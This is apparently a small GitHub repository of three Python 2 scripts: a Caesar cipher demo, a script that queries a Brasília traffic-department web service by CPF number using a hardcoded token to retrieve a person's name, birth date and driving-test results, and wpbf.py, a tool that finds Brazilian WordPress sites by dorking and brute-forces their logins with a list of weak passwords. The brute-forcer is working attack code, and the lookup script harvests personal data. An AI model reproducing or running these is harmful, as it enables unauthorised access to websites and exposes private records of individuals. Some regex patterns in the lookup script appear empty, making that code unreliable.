├── cifradecesar.py ├── getran_df.py └── wpbf.py /cifradecesar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #Exemplo encrypt e decrypt - Cifra de Cesar 3 | import sys 4 | 5 | def encrypt(mensagem): 6 | cifra = '' 7 | mensagem = mensagem.lower() 8 | for letras in mensagem: 9 | if letras in alfabeto: 10 | x = alfabeto.find(letras) + chave 11 | if x >= total: 12 | x -= total 13 | cifra += alfabeto[x] 14 | return cifra 15 | 16 | def decrypt(mensagem): 17 | cifra = '' 18 | mensagem = mensagem.lower() 19 | for letras in mensagem: 20 | if letras in alfabeto: 21 | x = alfabeto.find(letras) - chave 22 | cifra += alfabeto[x] 23 | return cifra 24 | 25 | 26 | if(len(sys.argv) < 4): 27 | print "[+] Modo de uso: ./cifra.py <--encrypt>" 28 | print "[+] Exemplo: ./cifra.py 3 aka --encrypt" 29 | else: 30 | alfabeto = 'abcdefghijklmnopqrstuvwxyz' 31 | total = 26 32 | chave = int(sys.argv[1]) 33 | msg = str(sys.argv[2]) 34 | 35 | if "--encrypt" in sys.argv[3]: 36 | print "[+] Mensagem: " + encrypt(msg) 37 | elif "--decrypt" in sys.argv[3]: 38 | print "[+] Mensagem: " + decrypt(msg) 39 | -------------------------------------------------------------------------------- /getran_df.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | # Script de consulta simples no banco de dados da Banca de Direção do Detran DF / By Jhonathan Davi A.K.A jh00nbr 5 | # jdavi@insightsecurity.com.br 6 | # Insightl4b - http://lab.insightsecurity.com.br 7 | # Blog: lab.insightsecurity.com.br 8 | # Github: http://github.com/jh00nbr 9 | # jhonathandavi.com.br 10 | # Twitter @jh00nbr 11 | 12 | import requests,sys,re 13 | 14 | __author__ = "Jhonathan Davi A.K.A jh00nbr" 15 | 16 | dados = {'nome':'','renach':'','cpf':'','dataNascimento':'','local':'','cfc':'','resultado':'', 'data':'','hora':''} 17 | 18 | def get_dados(contents): # Regex das tags XML 19 | nome = re.search('(.*)',contents).group(0).replace('','').replace('','') 20 | renach = re.search('(.*)',contents).group(0).replace('','').replace('','') 21 | cpf = re.search('(.*)',contents).group(0).replace('','').replace('','') 22 | dataNascimento = re.search('(.*)',contents).group(0).replace('','').replace('','') 23 | local = re.search('(.*)',contents).group(0).replace('','').replace('','') 24 | cfc = re.search('(.*)',contents).group(0).replace('','').replace('','') 25 | resultado = re.search('(.*)',contents).group(0).replace('','').replace('','') 26 | data = re.search('(.*)',contents).group(0).replace('','').replace('','') 27 | hora = re.search('(.*)',contents).group(0).replace('','').replace('','') 28 | dados['nome'],dados['renach'],dados['cpf'],dados['dataNascimento'],dados['local'],dados['cfc'],dados['resultado'],dados['data'],dados['hora'] = nome,renach,cpf,dataNascimento,local,cfc,resultado,data,hora 29 | 30 | if __name__ == "__main__": 31 | if len(sys.argv) > 1: 32 | configs = {'api_getran':'http://getran.detran.df.gov.br/getranServicos/ConsultaHabilitacaoWS?wsdl','cpf':sys.argv[1],'token':'TKN832JHGSI2937MNGHSJ9987','user_agent':'ksoap2-android/2.6.0+'} 33 | data = '' 34 | data += '' 35 | data += ''+configs['cpf']+'' 36 | data += ''+configs['token']+'' 37 | data += '' 38 | headers = {'User-Agent':configs['user_agent'],'SOAPAction':'http://getran.detran.df.gov.br/getranServicos/','Content-Type':'text/xml;charset=utf-8'} 39 | req = requests.post(configs['api_getran'],data=data,headers=headers) 40 | get_dados(req.content) # Chama a função get_dados e retorna os dados solicitados. 41 | print ' Nome completo:',dados['nome'] 42 | print ' CPF:',dados['cpf'] 43 | print ' Renach:',dados['renach'] 44 | print ' Data de nascimento:', dados['dataNascimento'] 45 | print ' CFC:',dados['cfc'] 46 | print ' Data:',dados['data'],'Hora:',dados['hora'] 47 | print ' Resultado:',dados['resultado'] 48 | else: 49 | print "[ ! ] Executar o script junto com o cpf: ./getran.py | ./getran.py 1234567890" 50 | -------------------------------------------------------------------------------- /wpbf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | #Inurlbr Dorking + Wordpress bruteforcing 4 | #Use: wpbf.py 5 | #Author: Jhonathan Davi | insightsecs at gmail.com | Twitter @jh00nbr 6 | #Inurl Brasil: blog.inurl.com.br | fb.com/InurlBrasil 7 | # Inurlbr.php: https://github.com/googleinurl/SCANNER-INURLBR/blob/master/inurlbr.php 8 | # https://www.youtube.com/watch?v=mEdonicOmfw 9 | 10 | import urllib 11 | import os 12 | import sys 13 | import requests as requests 14 | import re 15 | import subprocess 16 | from threading import Thread 17 | from time import sleep 18 | from subprocess import Popen, PIPE 19 | 20 | requests = requests.session() 21 | class bcolors: 22 | ENDC = '\033[0m' 23 | OKGREEN = '\033[92m' 24 | ERRO = '\033[91m' 25 | WARNING = '\033[93m' 26 | UNDERLINE = '\033[4m' 27 | 28 | def bruteforce(target,usr,pwd): 29 | print bcolors.WARNING + "[!] Checking in host: " + bcolors.ENDC + target + " | " + usr + ":" + pwd 30 | try: 31 | get = requests.get(target+'/wp-admin/') 32 | post = {'log': usr, 'pwd': pwd, 'wp-submit': 'Login', 'redirect_to': target, 'testcookie': '1'} 33 | get2 = requests.post(target+'/wp-login.php' , data=urllib.urlencode(post)) 34 | html = requests.get(target+'/wp-admin') 35 | adm = '
  • ' 36 | if adm in html.text: 37 | print bcolors.OKGREEN + "[+]"+ bcolors.ENDC + " Sucess in: " + target.replace("\n","").replace("\r","") + bcolors.OKGREEN + " " + usr + bcolors.ENDC + ":" + bcolors.OKGREEN + pwd + bcolors.ENDC 38 | requests.cookies.clear() 39 | except: 40 | print bcolors.ERRO + "[*]" + " Failed connection" + bcolors.ENDC 41 | 42 | if len(sys.argv) != 3: 43 | print "\n How to use: wpbf.py " 44 | sys.exit(1) 45 | else: 46 | drk = raw_input("\n Dorking use to find sites using the inurlbr?" + bcolors.OKGREEN + " [Y]" + bcolors.ENDC + bcolors.ERRO + "[N]" + bcolors.ENDC) 47 | if drk == "y" or drk == "yes" or drk == "Y" or drk == "Yes": 48 | os.system('clear') 49 | Popen(['xterm','-geometry', '80x43', '-T','Dorking inurlbr', '-e', 'php inurlbr.php -q 1,6 --dork "[DORK]site:blackwings.com.br -vestibulum -contato[DORK]inurl:wp-content site:.com.br[DORK]inurl:wp-content/plugins/ site:.com.br" -s list.txt --comand-all "echo _TARGET_ >> list.txt"']) 50 | elif drk == "n" or drk == "N": 51 | os.system('clear') 52 | print "\n" 53 | print " \ \ " 54 | print " \ \_ " 55 | print " _-~~ .\ " 56 | print " ,~ )___> " 57 | print " @~ / Inurlbr Dorking + Wordpress Bruteforcing " 58 | print " \____) " 59 | print " use: wpbf.py " 60 | print " [ Author: Jhonathan Davi | insightsecs at gmail.com | Twitter @jh00nbr ] " 61 | print " Inurl Brasil: blog.inurl.com.br | fb.com/InurlBrasil " 62 | print "\n\n\n" 63 | 64 | os.system("awk '!a[$0]++' " + sys.argv[1] + " >> hosts.txt") 65 | usr = sys.argv[2] 66 | urls = open("hosts.txt", "r").readlines() 67 | threads = [] 68 | 69 | for pwd in ["123", "mudarsenha","1234", "123mudar","t","q","pass123","mudar123","102030","123","test","q1w2e3r4t5","123456","123321","teste","0147852369","7777","admin","admin123"]: 70 | for target in urls: 71 | 72 | if 'com' not in target: 73 | print bcolors.ERRO + "[*] Url error: " + bcolors.ENDC + "http://" + target.replace("\n","").replace("\r","") 74 | else: 75 | html = requests.get("http://" +target.replace("\n","").replace("\r","")) 76 | if 'WordPress' in html.text: 77 | t = Thread(target=bruteforce, args=("http://"+target.replace("\n","").replace("\r",""),usr,pwd)) 78 | t.start() 79 | threads.append(t) 80 | for b in threads: 81 | b.join() 82 | else: 83 | print bcolors.ERRO + "[*] Not is wordpress: " + bcolors.ENDC + "http://" + target.replace("\n","").replace("\r","") 84 | 85 | else: 86 | os.system('clear') 87 | print "Responses: or " 88 | --------------------------------------------------------------------------------